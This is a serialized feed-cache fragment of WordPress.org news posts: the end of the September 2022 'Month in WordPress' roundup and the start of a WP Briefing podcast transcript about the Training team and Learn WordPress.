https://i0.wp.com/wordpress.org/news/files/2022/08/launch-featured.png?w=2000&amp;ssl=1 2000w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>In addition, <a href=\"https://make.wordpress.org/meta/2022/09/01/simplifying-the-admin-bar-global-navigation-menu/\">the admin bar and global navigation menu have been updated</a> to simplify and better organize the content across the WordPress.org network. Expect more design updates and iterations as efforts to refresh the website continue.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Check out the new <a href=\"https://wordpress.org/\">WordPress.org homepage</a> and <a href=\"https://wordpress.org/download/\">download page</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Gutenberg versions 13.9 and 14.0 are here</h2>\n\n\n\n<p>Two new versions of Gutenberg were released last month:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\"><strong>Gutenberg 13.9</strong></a> became available for download on August 17, 2022. This release continues to iterate and polish the user interface (UI), interaction, and engine work for site editing.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\"><strong>Gutenberg 14.0</strong></a> brings a lot of enhancements, including extra block supports in the UI, a revamped List block, and more. It shipped on August 31, 2022.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>This <a href=\"https://make.wordpress.org/core/2022/08/25/core-editor-improvement-refining-the-template-creation-experience/\">new post in the &#8220;Core Editor Improvement&#8221; series</a> focuses on the template creation enhancements coming in WordPress 6.1. You can explore them now with the <a href=\"https://wordpress.org/plugins/gutenberg/\">Gutengerg plugin</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>New localized content on Learn WordPress</h2>\n\n\n\n<p><a href=\"https://learn.wordpress.org/\">Learn WordPress</a> is currently expanding the non-English resources available on the platform! Last month, some members of the Training Team hosted <a href=\"https://wordpress.tv/2022/08/17/%e3%83%96%e3%83%ad%e3%83%83%e3%82%af%e3%82%a8%e3%83%87%e3%82%a3%e3%82%bf%e3%83%bc%e3%81%a7%e3%83%9b%e3%83%bc%e3%83%a0%e3%83%9a%e3%83%bc%e3%82%b8%e3%82%92%e4%bd%9c%e3%82%8d%e3%81%86%ef%bc%81/\">the first free online workshops in Japanese</a>. Following its success, two more sessions will be held on September 7 and 17, 2022. Get the details in the <a href=\"https://learn.wordpress.org/online-workshops/\">online workshop calendar</a>.</p>\n\n\n\n<p>In addition, learners have access to:</p>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/tutorials/?series=&amp;topic=&amp;language=pt_BR&amp;captions=&amp;wp_version=\">Portuguese tutorials</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/lesson-plans/greek/\">Greek lesson plans</a></li>\n</ul>\n\n\n\n<p>Curious about what else is new on Learn WordPress? <a href=\"https://make.wordpress.org/updates/2022/09/01/whats-new-on-learnwp-august-2022/\">Check out the learning materials released in August 2022</a>.</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p class=\"has-extra-large-font-size\">Enter the educational world of the Training Team and its Learn initiative in <a href=\"https://wordpress.org/news/2022/09/episode-38-all-about-learnwp-with-special-guest-hauwa-abashiya/\">the latest episode of WP Briefing</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Team updates: WordPress 6.0.2 maintenance release, Twenty Twenty-Three kickoff, and more</h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/\">WordPress 6.0.2 is now available</a>. This security and maintenance release features 12 bug fixes on Core, 5 bug fixes for the Block Editor, and 3 security fixes.</li>\n\n\n\n<li>The new <a href=\"https://make.wordpress.org/design/2022/08/10/twenty-twenty-three-default-theme-project-kickoff/\">Twenty Twenty-Three (TT3) theme</a>, which will ship with the WordPress 6.1 release, is now in development. The theme will bundle a collection of style variations designed by community members. The final curated set is expected to be chosen by September 7, 2022.</li>\n\n\n\n<li>The <a href=\"https://make.wordpress.org/community/2022/08/19/meetup-organizer-newsletter-august-2022/\">August edition of the Meetup Organizer Newsletter</a> shares tips on how to join and support the <a href=\"https://make.wordpress.org/community/2022/07/08/call-for-supporters-reactivating-wordpress-meetups-around-the-world/\">Meetup Reactivation project</a>.</li>\n\n\n\n<li>The feedback tool for <a href=\"https://translate.wordpress.org/\">translate.wordpress.org</a> is now available for all WordPress.org users that have opted into notifications. Learn more in the latest edition of the <a href=\"https://make.wordpress.org/polyglots/2022/08/22/polyglots-monthly-newsletter-august-2022/\">Polyglots Monthly Newsletter</a>.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/meta/2022/09/05/improving-devhub-code-references/\">Code references in DevHub (WordPress Developer Docs)</a> are now easier to use, understand and navigate.</li>\n\n\n\n<li>Members of the Documentation Team kicked off discussions around the <a href=\"https://make.wordpress.org/docs/2022/08/10/kick-off-wordpress-6-1-release-docs/\">WordPress 6.1 release docs</a>.</li>\n\n\n\n<li>The <a href=\"https://make.wordpress.org/core/2022/08/09/bug-scrub-schedule-for-6-1/\">bug scrub schedule for WordPress 6.1</a> was published last month. Anyone can join these sessions to learn, help, or even <a href=\"https://make.wordpress.org/core/handbook/tutorials/leading-bug-scrubs/\">lead one</a>.</li>\n\n\n\n<li>To celebrate World Photography Day (August 19), the Photos Team <a href=\"https://make.wordpress.org/photos/2022/08/18/wordpress-world-photography-day-challenge-2022/\">set up a fun photo challenge</a> to contribute to the <a href=\"https://wordpress.org/photos/t/worldphotographyday22/\">WordPress Photo Directory</a>. The initiative may be over, but photo contributions are always open!</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/performance/2022/08/09/core-performance-team-rep-nominations/\">Nominations</a> for the Performance Team Reps are open until September 9, 2022.</li>\n\n\n\n<li>Why is Gutenberg being developed on GitHub? Is Gutenberg part of core? <a href=\"https://make.wordpress.org/core/2022/08/18/wordpress-development-setup/\">Get answers</a> to these and other common questions about WordPress core and Gutenberg.</li>\n\n\n\n<li>Members of the Full Site Editing Outreach program <a href=\"https://make.wordpress.org/test/2022/08/25/hallway-hangout-discussion-on-block-themes-25-aug/\">joined a Hallway Hangout session to talk about block themes</a>, from workflow changes to tools they are using and more.</li>\n\n\n\n<li>The latest edition of People of WordPress features <a href=\"https://wordpress.org/news/2022/08/people-of-wordpress-bud-kraus/\">Bud Kraus</a> and his inspiring WordPress journey.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>The Testing Team is looking for <a href=\"https://make.wordpress.org/test/2022/08/10/testing-testing-calls-for-testing-facilitators/\">facilitators to expand testing efforts</a> across the project.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Feedback &amp; testing requests</h2>\n\n\n\n<ul>\n<li>Are you a meetup organizer or member? Complete the 2021-2022 <a href=\"https://make.wordpress.org/community/2022/08/02/announcing-the-2021-2022-annual-meetup-survey/\">Annual Meetup Survey</a> (available in 14 languages) to help strengthen this global WordPress program.</li>\n\n\n\n<li>Members of the Core Team are looking for feedback on a <a href=\"https://make.wordpress.org/core/2022/08/19/a-new-system-for-simply-and-reliably-updating-html-attributes/\">new system for updating HTML attributes</a>. The call is open until September 9, 2022.</li>\n\n\n\n<li>There’s a new proposal to <a href=\"https://make.wordpress.org/core/2022/08/10/proposal-stop-merging-experimental-apis-from-gutenberg-to-wordpress-core/\">harmonize the process of merging new APIs from the Gutenberg plugin</a> to the WordPress core. Share your thoughts by September 7, 2022.</li>\n\n\n\n<li>Version 20.6 of WordPress for <a href=\"https://make.wordpress.org/mobile/2022/08/23/call-for-testing-wordpress-for-android-20-6/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2022/08/22/call-for-testing-wordpress-for-ios-20-6/\">iOS</a> is available for testing.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Gutenberg 13.8 introduced the first version of fluid typography, a new feature that allows theme authors to define text size that can scale and adapt to changes in screen size. <a href=\"https://make.wordpress.org/themes/2022/08/15/testing-and-feedback-for-the-fluid-typography-feature/\">Help shape its future by joining this testing call</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Event updates &amp; WordCamps</h2>\n\n\n\n<ul>\n<li><a href=\"https://us.wordcamp.org/2022/wcus-what-you-need-to-know/\">Get ready for WordCamp US</a>! The event is happening on September 9 through 11, 2022, in San Diego, California. <a href=\"https://us.wordcamp.org/2022/schedule/\">Check out the schedule</a> and tune into the <a href=\"https://us.wordcamp.org/2022/livestream/\">WCUS livestream</a> if you are attending virtually.</li>\n\n\n\n<li>Openverse announced that they will be participating in the WordCamp US <a href=\"https://us.wordcamp.org/2022/contributor-day/\">Contributor Day</a> remotely. <a href=\"https://make.wordpress.org/openverse/2022/08/30/openverse-remote-contributor-day-at-wordcamp-us-2022/\">Learn how you can get involved</a>.</li>\n\n\n\n<li><a href=\"https://asia.wordcamp.org/2023/\">WordCamp Asia</a> organizers <a href=\"https://asia.wordcamp.org/2023/tickets-now-on-sale/\">sold out</a> the first batch of standard and micro sponsor tickets in one day. The second batch will be released soon.</li>\n\n\n\n<li>Planning for WordCamp Europe 2023 is in full swing! You can still <a href=\"https://europe.wordcamp.org/2023/call-for-organisers/\">apply to be an organizer</a>.</li>\n\n\n\n<li>Join #WPDiversity with a <a href=\"https://www.eventbrite.com/e/speaker-workshop-for-indian-women-in-the-wordpress-community-sept-24-25-tickets-348466712317\">free, online speaker workshop for Indian women</a> in the WordPress community. The event will take place on September 24-25, 2022.</li>\n\n\n\n<li>Don’t miss these other upcoming WordCamps:\n<ul>\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1f3-1f1f1.png\" alt=\"🇳🇱\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://netherlands.wordcamp.org/2022/\">WordCamp Netherlands</a>, The Netherlands on September 15-16, 2022</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1ea-1f1f8.png\" alt=\"🇪🇸\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://pontevedra.wordcamp.org/2022/\">WordCamp Pontevedra</a>, Spain on September 24-25, 2022</li>\n</ul>\n</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>The Call for Speakers for WordCamp Asia is closing soon! <a href=\"https://asia.wordcamp.org/2023/call-for-speakers/\">Submit your application by September 30, 2022</a>, and help reach <a href=\"https://asia.wordcamp.org/2023/speaker-diversity-goals/\">WCAsia&#8217;s speaker diversity goals</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<p><strong><em><strong><em><strong><em>Have a story that we should include in the next issue of The Month in WordPress? <strong><em>Fill out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this quick form</em></strong></a><strong><em> to let us know.</em></strong></em></strong></em></strong></em></strong></p>\n\n\n\n<p><em><em>The following folks contributed to this edition of The Month in WordPress: <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a>, <a href=\'https://profiles.wordpress.org/mysweetcate/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mysweetcate</a>, <a href=\'https://profiles.wordpress.org/chaion07/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chaion07</a>, <a href=\'https://profiles.wordpress.org/bsanevans/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>bsanevans</a>, <a href=\'https://profiles.wordpress.org/priethor/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>priethor</a>, <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a>, <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>.</em></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13445\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WP Briefing: Episode 38: All About LearnWP with Special Guest Hauwa Abashiya\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"https://wordpress.org/news/2022/09/episode-38-all-about-learnwp-with-special-guest-hauwa-abashiya/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2022 12:01:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13425\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"Enter the educational world of the WordPress Training team and its Learn initiative during this week\'s episode of the podcast. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/09/WP-Briefing-038.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:21067:\"\n<p>In the thirty-eighth episode of the WordPress Briefing, join Josepha Haden Chomphosy and special guest Hauwa Abashiya for a discussion on the WordPress Training team and LearnWP initiative. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a> <br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2>Guests</h2>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/azhiyadev/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/azhiyadev/\">Hauwa Abashiya</a>&nbsp;</p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://heropress.com/essays/finding-my-global-family/\" data-type=\"URL\" data-id=\"https://heropress.com/essays/finding-my-global-family/\">Hauwa Abashiya HeroPress Essay</a><br><a href=\"https://make.wordpress.org/training\">make.wordpress.org/training</a><br><a href=\"http://make.wordpress.org\">make.wordpress.org</a><br><a href=\"https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/\" data-type=\"URL\" data-id=\"https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/\">WordPress 6.0.2 Security and Maintenance Release</a><br><a href=\"https://asia.wordcamp.org/2023/call-for-speakers/\" data-type=\"URL\" data-id=\"https://asia.wordcamp.org/2023/call-for-speakers/\">WordCamp Asia call for speakers </a>(deadline extended to September 30, 2022)<br><a href=\"https://us.wordcamp.org/2022/livestream/\" data-type=\"URL\" data-id=\"https://us.wordcamp.org/2022/livestream/\">WordCamp US Livestream information</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13425\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello, everyone! And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it, as well as get a small list of big things coming up in the next two weeks. I’m your host, Josepha Haden Chomphosy. Here we go!</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:42]&nbsp;</strong></p>\n\n\n\n<p>Helping people who are new to WordPress learn how to make the most out of their CMS used to be one of the most clearly impactful things I ever did as a contributor. Whether it was making sure a brand new installation simply worked, or if the original setup needed to grow along with a solopreneur&#8217;s growing business needs, I found great joy in seeing how my local community was learning new tools together.</p>\n\n\n\n<p>You&#8217;ve probably heard me talk about the Learn WP initiative or the training team on this podcast before, but you might still be a little shy to get started with the team. So I have invited one of their team reps today to talk through what the team does.</p>\n\n\n\n<p>All right. I have with us today Hauwa Abashiya. She is one of the team reps for the training team and also works on the learn.wordpress.org site. Thank you for joining me today, Hauwa.</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:01:33]&nbsp;</strong></p>\n\n\n\n<p>And thank you for having me, Josepha, quite exciting to be on your podcast.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:37]&nbsp;</strong></p>\n\n\n\n<p>Oh, I, you know, when we were talking about doing this topic, I was like, you know, who would be an excellent person is Hauwa. Like you were such an interesting person to work with when we were working on the <a href=\"https://wordpress.org/news/2020/12/simone/\">5.6 release</a>. And then also, you just have such a lovely way of explaining the complicated things that we have going on in WordPress and especially on the training side of things. And so you were the first person that came to mind for me.</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:02:02]</strong></p>\n\n\n\n<p>Thank you.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:03]</strong></p>\n\n\n\n<p>Speaking of all the learn.wordpress.org things, you&#8217;ve been contributing to the WordPress project as a team rep for the training team for a bit. But that&#8217;s not really where you started. Can you tell me a bit about how you found your way to this team?&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:02:15]</strong></p>\n\n\n\n<p>Well, I started by attending a WordCamp, and that was WordCamp Brighton. And if anyone&#8217;s read my <a href=\"https://heropress.com/essays/finding-my-global-family/\">article on HeroPress</a>, then they will know that I learned WordPress in one week. Went through beginner sessions of it. And then, I was like, yeah, let me just go turn up and see what it&#8217;s like.</p>\n\n\n\n<p>So turned up, and I met some wonderful people there. One of them being <a href=\"https://profiles.wordpress.org/miss_jwo/\">Jenny Wong</a>, who introduced me to the London meetup team. So, I then went there. They were looking for volunteers because they were planning WordCamp London for 2019. And me being me, I was like, yeah, sure. Why not? And got thrown into the deep end, but no, an amazing team.</p>\n\n\n\n<p>I got to meet some really amazing people. And yeah, just went from there then, you know, because I was doing stuff with WordCamp London, ended up going to WordCamp Europe. And I think there&#8217;s probably quite a lot of people who say they fully got into contributing in WordCamp Europe. So I was doing little bits and pieces then on like, marketing team and then met <a href=\"https://profiles.wordpress.org/jessecowens/\">Jesse [Owens]</a>  at the training team cause <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a> introduced me to him and just went from there.</p>\n\n\n\n<p>And then in terms of team rep, I mean, <a href=\"https://wordpress.org/support/users/courane01/\">Courtney Robertson</a> sent out SOS, because Learn had just launched, and there were a couple of things that we needed. So that was during the soft launch. And I was like, yeah, sure. I&#8217;ll help you. I&#8217;m not doing much. And that&#8217;s how I ended up doing team rep.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:03:46]</strong></p>\n\n\n\n<p>I love that so many initial stories in the WordPress community start with like, well, I went to a WordCamp cause I was like, what in the world is this? And then people were like, we need some help. And I thought to myself, what else am I doing? Like, so many stories start that way. And I just love it.&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:04:03]</strong></p>\n\n\n\n<p>Yeah.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:04:03]</strong></p>\n\n\n\n<p>So you mentioned learn.wordpress.org. That is a part of the training team in the WordPress project. Correct?</p>\n\n\n\n<p>Yeah. So can you give us an idea of the difference between the two? Cause like normally, with a project as big as Learn, you would expect to see like a whole separate team. But these are two intertwined teams using two intertwined concepts.</p>\n\n\n\n<p>And so can you give us an idea of the difference between them?&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:04:29]</strong></p>\n\n\n\n<p>So I like to see learners, that&#8217;s the content. So it&#8217;s the content that we have on the platform, and the training team wrangles all the content on Learn. So that would be like your videos, your lesson plans, and online workshops. Yeah, so we wrangle the content that&#8217;s on there.</p>\n\n\n\n<p>We try to bring a lot of different teams together, and that&#8217;s one of the things the beauty, I think, of Learn is that there is a lot of cross-team collaboration, which started from the beginning and I think just will continue and get better and better.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:04:59]</strong></p>\n\n\n\n<p>Yeah. And the workshops, those are once a week, right?&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:05:04]</strong></p>\n\n\n\n<p>Yeah. So you have online workshops, which used to be called social learning spaces, which used to be called discussion groups. So those run once a week. There&#8217;s a number running, and there are some that are launching in Japan. And I think <a href=\"https://profiles.wordpress.org/bsanevans/\">Ben Evans</a> has been quite key in getting quite a lot of those going, and I think <a href=\"https://profiles.wordpress.org/piyopiyofox/\">Destiny Kanno</a> as well.</p>\n\n\n\n<p>So, that&#8217;s the beauty is you get to see a lot more languages coming up. Those run once a week. And then we obviously have lesson plans, which traditionally that&#8217;s what the training team used to always make for Meetup organizers. So if you didn&#8217;t have a speaker, you could go and get a lesson plan and run through something, or anybody could pick one up.</p>\n\n\n\n<p>So they are used mainly by like our Meetup users and then people who are running any boot camps or sessions, or you wanna just take somebody through WordPress and teach them, you can pick one up and run through it. And now we&#8217;ve got courses on Learn, which is quite exciting. Got a couple of courses.</p>\n\n\n\n<p>And I know there&#8217;s about three or four courses in development. There is a bit more WordPress development based rather than user based. There&#8217;s a fourth piece of content, and that is just the general workshop. So tutorials, I think no tutorials is what we&#8217;re calling them now. So there&#8217;s like all our online videos.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:17]</strong></p>\n\n\n\n<p>I tell you terminology in any project, the age and size of WordPress is hard to keep everything straight, but especially when you&#8217;ve just changed it you&#8217;re like, what do we call it though?&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:06:27]</strong></p>\n\n\n\n<p>Yeah.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:30]</strong></p>\n\n\n\n<p>So if I understand correctly, because as you mentioned, like you have this post up on HeroPress, you don&#8217;t actually come from a training background. Like you aren&#8217;t a teacher or corporate trainer or anything, but you have really committed to contributing to the training team and to learn.wordpress.org.</p>\n\n\n\n<p>So, from your perspective, from like the, I&#8217;m not a trainer perspective, what&#8217;s the most exciting thing for learn.wordpress.org in the near future?&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:06:58]</strong></p>\n\n\n\n<p>I think it&#8217;s the collaboration. It&#8217;s the potential that Learn has. So I don&#8217;t have a training background, but interestingly enough, I come from Kaduna, Nigeria. And Kaduna cause all the states in Nigeria have a tagline, and, Kaduna is actually the center of learning. So there must be some link there, so yeah.</p>\n\n\n\n<p>So, I think the beauty of that is you don&#8217;t have to have a training background. You can come in and impart your knowledge, and there are people available in the team that can help you impart that knowledge. So if it&#8217;s like a lesson plan that you wanna draw up, we&#8217;ve got people that can help and assist in that.</p>\n\n\n\n<p>Or you wanna run an online workshop. There are people that can assist you. And I think that&#8217;s also the beauty of WordPress is that we&#8217;re all there to help each other. So just seeing that and seeing how, as time has gone on how the team has actually just been growing cause more and more people are coming.</p>\n\n\n\n<p>And then with that, you&#8217;ve got more of like the different languages coming in, and I know we might touch on that later, but it&#8217;s, I think to me, that is the beauty that anyone can actually now come in and learn. And Learn as this platform that is accessible to everybody. So it&#8217;s not necessarily behind a, like a paywall or anything, which is, there&#8217;s nothing wrong with that, but there are people that it&#8217;s like, well, okay, you can access something by the community for the community.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:08:32]</strong></p>\n\n\n\n<p>I think like your last thought there, something that&#8217;s by the community for the community. That&#8217;s one of the things that I noticed early on about the WordPress community. So I&#8217;ve been in the WordPress community for a long time, but when I started doing the administrative back office, things that are invisible and no one wants to know about, because it&#8217;s boring.</p>\n\n\n\n<p>When I started doing that work, one of the things I noticed and that I really treasure the most about the WordPress community is that they want to do things together. They want to look at the problem together. They want to find a solution together. And a lot of times they just want to learn together as well.</p>\n\n\n\n<p>We see that there is a real, I don&#8217;t know, not, it&#8217;s not a safety and numbers question. I think it is a long-standing feeling that we can all kind of get further together and that we are better together. And so I like your thought there.</p>\n\n\n\n<p>You mentioned, though, translations, and I know that this came up at WordCamp Europe.</p>\n\n\n\n<p>We don&#8217;t actually have a lot of translated content on learn.wordpress.org. There&#8217;s some technical issues that exist there, but are there a few languages that we already are sort of seeing translated courses for? Translated lessons for?&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:09:47]</strong></p>\n\n\n\n<p>Yeah. So we have a couple in Hindi, I believe. And I know we&#8217;ve got some Greek translations that have been coming up, so I know, I think it was last year WordCamp India, during contributor day, we had quite a lot of people translating stuff then, and I suppose the online WordCamps that we&#8217;ve been able to rank. Cause I think our first like face to face is this year, so they didn&#8217;t do that much translation there, but we&#8217;ve seen an increase in people wanting to translate.&nbsp;</p>\n\n\n\n<p>And I think those are the ones that come to mind. And I know Japanese, I think that was just recently, in the last two weeks, somebody&#8217;s translated one or two of the tutorials have been translated.</p>\n\n\n\n<p>But we’re getting more and more requests coming through. And I know we kind of touched on this in our earlier discussion, but it&#8217;s like, how do you manage that? Cause you&#8217;re right, we don&#8217;t have a way to easily manage polyglots on Learn at the moment or WordPress in general. But I think seeing that, and I keep saying to people, I don&#8217;t wanna lose that engagement cause if you&#8217;ve got the people engaged, let them just do it.</p>\n\n\n\n<p>And I don&#8217;t normally say this, but let them do it, and we&#8217;ll figure out how to sort out the whole pile when it comes in later. Because you kind of don&#8217;t want to lose them because I feel like if we say, no, we&#8217;ll wait until that comes in, we&#8217;ll lose a lot of the engagement. And come that time, people will be like, oh no, I&#8217;m not that interested. Or it might be an even more effort to try and bring more people on board.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:18]</strong></p>\n\n\n\n<p>That&#8217;s always a struggle, like wanting to be able to get something good out without insisting that it be perfect. Like that whole perfect is the enemy of the good sort of concept.&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:11:30]</strong></p>\n\n\n\n<p>Yeah. Mm-hmm&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:30]</strong></p>\n\n\n\n<p>When we were talking about this way back in June, I was like, I obviously would love to get a perfect solution out immediately, but like, you&#8217;re right.</p>\n\n\n\n<p>In the meantime, do we just be if you don&#8217;t speak English, you cannot learn here?</p>\n\n\n\n<p>Like that&#8217;s not fair.</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:11:45]</strong></p>\n\n\n\n<p>No.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:46]&nbsp;</strong></p>\n\n\n\n<p>We want everyone to be able to 